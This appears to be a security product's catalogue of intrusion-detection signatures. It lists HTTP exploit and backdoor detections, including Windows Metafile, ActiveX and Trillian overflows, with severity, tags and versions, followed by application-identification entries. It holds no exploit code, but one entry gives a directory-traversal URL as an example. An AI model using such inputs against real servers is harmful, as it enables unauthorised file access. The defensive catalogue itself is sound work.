HTTP_Trillian-Aim:-URI-Handler-Buffer-Overflow

About this situation: Buffer overflow exploit against Trillian detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Trillian, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Trillian-Aim:-URI-Handler-Buffer-Overflow
Description:
Back to top

HTTP_Trillian-Aim:-URI-Handler-Code-Injection

About this situation: Attempt to exploit code injection vulnerability in Trillian detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Trillian, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Trillian-Aim:-URI-Handler-Code-Injection
Description:
Back to top

HTTP_Unable-To-Normalize-URL

About this situation: Unable to normalize the URL
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Unable to normalize URL.
Back to top

HTTP_Upgraded-To-WebSocket

About this situation: Detects the start of a WebSocket protocol session
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description: A WebSocket protocol session was started. WebSocket (RFC 6455) is a lightweight application protocol intended to enable reliable, bidirectional frame-based message exchange over TCP or TLS. It is designed to be compatible with existing HTTP proxies by making the opening handshake conform to a valid HTTP GET request that uses the standard HTTP protocol upgrade headers to indicate that the protocol should be switched to WebSocket. Therefore, WebSocket is always initially identified as HTTP.
Back to top

HTTP_URI-Cgit-Path-Parameter-Directory-Traversal-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Cgit detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cgit, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: Cgit-Path-Parameter-Directory-Traversal-Information-Disclosure
Description:
Back to top

HTTP_URI-Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in EmbedThis GoAhead detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, EmbedThis GoAhead, CVE2017, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1640-5242
Vulnerability: Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution
Dell-EMC-iDRAC-Cgi-Injection-CVE-2018-1207
Description:
Back to top

HTTP_URI-Excessive-Length

About this situation: HTTP URI exceeds 3865 bytes
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-352-4219
Last changed: sgpkg-ips-352-4219
Description: The URI has exceeded 3865 bytes.
Back to top

HTTP_URI-Kodi-Local-File-Inclusion

About this situation: A Kodi Local File Inclusion vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Windows, Linux, Mac OS X, Android, Any Hardware, Kodi, CVE2017, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: Kodi-Local-File-Inclusion
Description:
Back to top

HTTP_URI-too-long

About this situation: HTTP URI too long
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Request denied due to length of URI.
Back to top

HTTP_URI-Xen-Project-Xapi-Update-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Xen Project XAPI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Xen Project XAPI, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Vulnerability: Xen-Project-Xapi-Update-Directory-Traversal
Description:
Back to top

HTTP_URL-Logged

About this situation: HTTP URL logged
Context: HTTP without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An HTTP URL was logged. Risk analysis: Risk level is none. Seeing an HTTP request is not a signal of an attack. This is an informative message configured to be reported in the HTTP protocol agent parameters ('Logging of accessed URLs').
Back to top

HTTP_URL-Processed

About this situation: The HTTP URL was processed successfully
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: The URL in an HTTP request was processed. URL filtering and possible categorization was completed for this request.
Back to top

HTTP_URL-Shared-Variables

About this situation: Fingerprints that set variables shared between multiple fingerprints
Context: HTTP URL
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_User_Response_Buffering_Limit_Exceeded

About this situation: Connection was terminated without a user response
Context: User Response without parameters
Severity: 2
Tags: Obsolete
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Description: An HTTP user response could not be performed. The connection was terminated instead. The most common reason for this situation is that the traffic that triggered a user response contained too much data. This can result from, for example, a too long HTTP POST transfer. This situation can also occur if the engine is running out of resources and is therefore unable to carry out the user response.
Back to top

HTTP_User_Response_Forced_Termination

About this situation: Connection was terminated without a user response
Context: User Response without parameters
Severity: 2
Tags: Obsolete
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Description: An HTTP user response could not be performed. The connection was terminated instead. The most common reason for this situation is that the traffic that triggered a user response was not valid HTTP. This can result from, for example, a non-HTTP protocol being inspected as HTTP, a faulty application, or an attack that deliberately violates the HTTP protocol specifications. This situation can also occur if the engine is running out of resources and is therefore unable to carry out the user response.
Back to top

HTTP_User_Response_Not_Supported

About this situation: User response was not generated
Context: User Response without parameters
Severity: 2
Tags: Obsolete
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Description: Missing functionality prevented performing an HTTP user response. Connection was not terminated. This situation can result when a user response is attempted for a connection on a capture interface (where user responses can not be generated) or a tunnel (for which user response is not supported). Connection is not terminated by default. Supported functionality (such as active termination or dropping the connection) can be configured with this situation.
Back to top

HTTP_Version-Varies

About this situation: Different HTTP versions in same connection
Context: HTTP without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-627-5211
Description: Different HTTP versions are used in the same HTTP connection. Risk analysis: Risk level is low. It is suspicious if different HTTP versions are used within a single connection. This may indicate an evasion attempt.
Back to top

HTTP_WANRemote-Backdoor-Response

About this situation: WANRemote backdoor response
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, WANRemote, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Backdoor-WANRemote
Description:
Back to top

HTTP_Web-Server-CT-Backdoor-Response

About this situation: Web Server CT backdoor response
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Web Server CT, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Backdoor-Web-Server-CT
Description:
Back to top

HTTP_Webroot-Exit

About this situation: HTTP request tries to access data outside the server webroot
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies, SSM HTTP Proxy
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-297-4219
Description: An URL in a HTTP request was seen that tries to access the parent directories above the webroot directory of the server, for example using an URL like http://host.domain/../file.html.
Back to top

HTTP_Whitespace

About this situation: Invalid whitespace
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Too much leading whitespace on request.
Back to top

HTTP_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise

About this situation: Detects Windows HSC dvdupgrade URL
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Any Hardware, Microsoft Help and Support Center, MS2004, CVE2004, Windows XP not specific, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise
Description:
Back to top

HTTP_Windows-Helpctr-Exe-Hcp-Url-System-Compromise

About this situation: Detects links to vulnerable Windows HCP services
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Any Hardware, Microsoft Help and Support Center, CVE2004, Windows XP not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Windows-Helpctr-Exe-Hcp-Url-System-Compromise
Description:
Back to top

HTTP_Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow

About this situation: Exploit against Windows Media Player via malformed BMP header (MS06-005)
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Windows Media Player, MS2006-02, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-59-1210
Last changed: sgpkg-ips-401-4219
Vulnerability: BMP-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
Description:
Back to top

HTTP_Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow

About this situation: Exploit against Windows Media Player via a long SRC field in a HTML embed tag (MS06-006)
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Windows Media Player, MS2006-02, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-60-1210
Last changed: sgpkg-ips-167-2032
Vulnerability: HTTP-Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow
Description:
Back to top

HTTP_Windows-Metafile-Vulnerability-MS05-053

About this situation: Detects malformed WMF images that have very large values set as the size of the largest record
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2005-11, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: WMF-Windows-Metafile-Vulnerability-MS05-053
Description:
Back to top

HTTP_Winhlp32-Item-Buffer-Overflow

About this situation: Buffer overflow in Winhlp32
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, CVE2002, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-Winhlp32-Item-Buffer-Overflow
Description:
Back to top

HTTP_WinZip-FileView-ActiveX-Control-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the WinZip FileView ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, WinZip, MS2006-11, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-WinZip-FileView-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this situation: Detects malicious Metasploit-made WMF files being downloaded from HTTP servers
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-52-1210
Last changed: sgpkg-ips-149-2032
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

HTTP_WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow

About this situation: Detects malformed placeable WMF images with an illegal FileSize value in header (MS06-004)
Context: HTTP Server Stream
Severity: 7
Tags: Windows 2000, Windows ME, x86, MS2006-02, CVE2006, Windows 2000 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow
Description:
Back to top

HTTP_WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this situation: Detects malicious WMF files being downloaded from HTTP servers
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-50-1210
Last changed: sgpkg-ips-274-4219
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

HTTP_WScript.Shell-ActiveX-Object-Local-File-Execute

About this situation: Detected a local file execute attempt using WScript.Shell ActiveX object
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-192-2032
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

HTTP_WScript.Shell-ActiveX-Object-Local-Registry-Access

About this situation: Detected an attempt to access local registry using WScript.Shell ActiveX object
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-205-2032
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

HTTP_XML-Content

About this situation: HTTP XML Content
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: The content-type field contains XML Risk analysis: Risk level is low. This is for information only.
Back to top

HTTP_XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF

About this situation: Detects XPM images that will cause a buffer overflow in libXPM
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, libXpm, CVE2004, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF
Description:
Back to top

HTTP_Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution

About this situation: Attempt to exploit a vulnerability in Xunlei Thunderbolt detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Xunlei Thunderbolt, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-249-3038
Vulnerability: Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution
Description:
Back to top

HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Yahoo! Toolbar detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Yahoo! Widgets, Yahoo! Toolbar, Yahoo Messenger, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_Yahoo-Audio-Conferencing-ActiveX-Control-Buffer-Overflow

About this situation: Buffer overflow exploit against vulnerability in the Yahoo! Audio Conferencing ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Yahoo Chat, Yahoo Messenger, CVE2003, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Yahoo-Audio-Conferencing-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_Yahoo-Messenger-YMailAttach-ActiveX-Control-Buffer-Overflow

About this situation: Buffer overflow exploit against vulnerability in the Yahoo! Messenger YMailAttach ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, x86, Yahoo Messenger, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Yahoo-Messenger-YMailAttach-ActiveX-Buffer-Overflow
Description:
Back to top

Huawei

About this situation: Application Huawei detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Huawei is a Chinese multinational networking and telecommunications equipment and services company
Back to top

Huawei-DBank

About this situation: HuaWei DBank usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-623-5211
Description: HuaWei DBank is an online cloud storage and file sharing service which was launched by Huawei Software Technologies Co, Ltd. It provides free cloud storage, and basic file upload and download services, as well as filesharing features. The service can be accessed at the website http://dbank.vmall.com, or through a client application for Windows, Mac PC, Android, iPhone or iPad.
Back to top

hubiC

About this situation: Application hubiC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: hubiC offers synchronise user data across devices and share files.
Back to top

HubLogix

About this situation: Application HubLogix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HuboLogix is a web-based fulfillment platform for retailers that sell third-party inventory.
Back to top

Hubpages

About this situation: HubPages usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to share written content, pictures, and videos. Source: Wikipedia
Back to top

Hubspot

About this situation: HubSpot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to access features for social media marketing, email marketing, content management, web analytics, and search engine optimization. Source: Wikipedia
Back to top

Hubstaff

About this situation: Application Hubstaff detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hubstaff is a work time tracker software with screenshots, online timesheet, internet monitor and app usage.
Back to top

Huddle

About this situation: Application Huddle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Huddle is a privately held cloud-based collaboration and content management software company
Back to top

Huffington-Post

About this situation: Huffington Post usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-595-5211
Description: The Huffington Post is an American online news aggregator and blog. Source: Wikipedia
Back to top

HulkShare

About this situation: Application HulkShare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HulkShare internet radio provides music to discover new artists and connect with artists and friends.
Back to top

Hulu

About this situation: Hulu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Hulu is an ad-supported on-demand video streaming service.
Back to top

Humanity

About this situation: Application Humanity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Human - business management software designed to organize your people.
Back to top

Humble-Bundle

About this situation: Application Humble-Bundle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Humble Bundle is a digital storefront for video games and ebooks.
Back to top

Humyo

About this situation: humyo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a data storage service that allows users to upload, share and publish files (for example, photos, music, videos and other files) on web pages. humyo synchronizes files across multiple computers and a remote data store. The free storage space offered is 10GB. Source: Wikipedia
Back to top

Hungama

About this situation: Application Hungama detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hungama service for listening bollywood songs, hindi music Download mp3s online and watch video songs and hindi movies online.
Back to top

HuronConsultingGroup

About this situation: Application HuronConsultingGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HuronConsultingGroup helps clients to improve performance, comply with complex regulations, reduce costs, leverage technology, and stimulate growth. It provides services to financially sound including healthcare organizations, academic institutions, medium-sized businesses, and the law firms.
Back to top

Hushly

About this situation: Hushly B2B marketing
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description: Hushly is a company focused on improving B2B marketing.
Back to top

Hushmail

About this situation: Hushmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-636-5211
Description: Hushmail is a web-based email service.
Back to top

Huuto.net

About this situation: Huuto.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-630-5211
Description: Huuto.net is a Finnish online auction website.
Back to top

HYPE-GO!

About this situation: Application HYPE-GO! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HYPE GO
Back to top

Hyperoffice

About this situation: HyperOffice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: HyperOffice offers web collaboration, online meeting, web conferencing, online database and email marketing applications to the small and mid sized business segment. HyperOffice Collaboration Suite, which contains integrated tools like business email, mobile mail, document collaboration, intranet/extranet publishing, contact management, calendaring, task management, forums, and other applications.
Back to top

HyperSites

About this situation: Application HyperSites detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HyperSites is browser based web development tools provider for web designers.
Back to top

Hyrell

About this situation: Application Hyrell detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hyrell - web-based applicant tracking software.
Back to top

Hyves

About this situation: Hyves usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

i-Mortgage-Services

About this situation: Application i-Mortgage-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iMortgage Services
Back to top

i-netGarment

About this situation: Application i-netGarment detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: i-netGarment offering internet-based business application utilization and secured data hosting service for enterprises in the garment industry.
Back to top

I-nexus

About this situation: Application I-nexus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: i-nexus is a provider of on-demand software that helps organizations to drive consistent execution of their business goals.
Back to top

iAdvize

About this situation: Application iAdvize detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iAdvize is real-time customer engagement platform, connect with your online visitors on your website and on social media.
Back to top

IASO

About this situation: Application IASO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IASO is hybrid cloud backup and disaster recovery for MSP's, Telco's and Datacenter Hosting companies.
Back to top

IBackup

About this situation: Application IBackup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IBackup - Small Business Online Backup is solution for multi-platform backup including databases.
Back to top

iBE.net

About this situation: Application iBE.net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iBE.net is an integrated cloud solution that enables businesses to efficiently manage contacts, projects, tasks, time, expenses, billing, leads, opportunities and analytics all within one collaborative platform.
Back to top

Ibibo

About this situation: Ibibo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

IBM BigFix Client

About this situation: Endpoint Context Agent based IBM BigFix Client detection
Context: EI Correlation
Severity: 1
Tags: Remote Administration, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: IBM BigFix Client endpoint application has been detected. IBM BigFix is a remote administration tool for managing large groups of computers.
Back to top

IBM-Blueworks-Live

About this situation: Application IBM-Blueworks-Live detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Blueworks Live application is designed to help organizations discover and document their business processes, business decisions and policies in a collaborative manner.
Back to top

IBM-DB2

About this situation: IBM DB2 traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-759-5211
Description: IBM DB2 is a relational model database server developed by IBM.
Back to top

IBM-DB2-Over-DRDA

About this situation: IBM DB2 traffic over DRDA detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-759-5211
Description: IBM DB2 is a relational model database server developed by IBM.
Back to top

IBM-Kenexa-Products

About this situation: Application IBM-Kenexa-Products detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IBM Kenexa provides employment and retention solutions to assist organizations in hiring and keeping workers. Such services include Kenexa recruitment process outsourcing
Back to top

IBM-solidDB

About this situation: IBM SolidDB traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-759-5211
Description: SolidDB is a relational database management system offered by Solid, an IBM Company.
Back to top

Ibs

About this situation: Application Ibs detected
Context: Application Context
Severity: 1
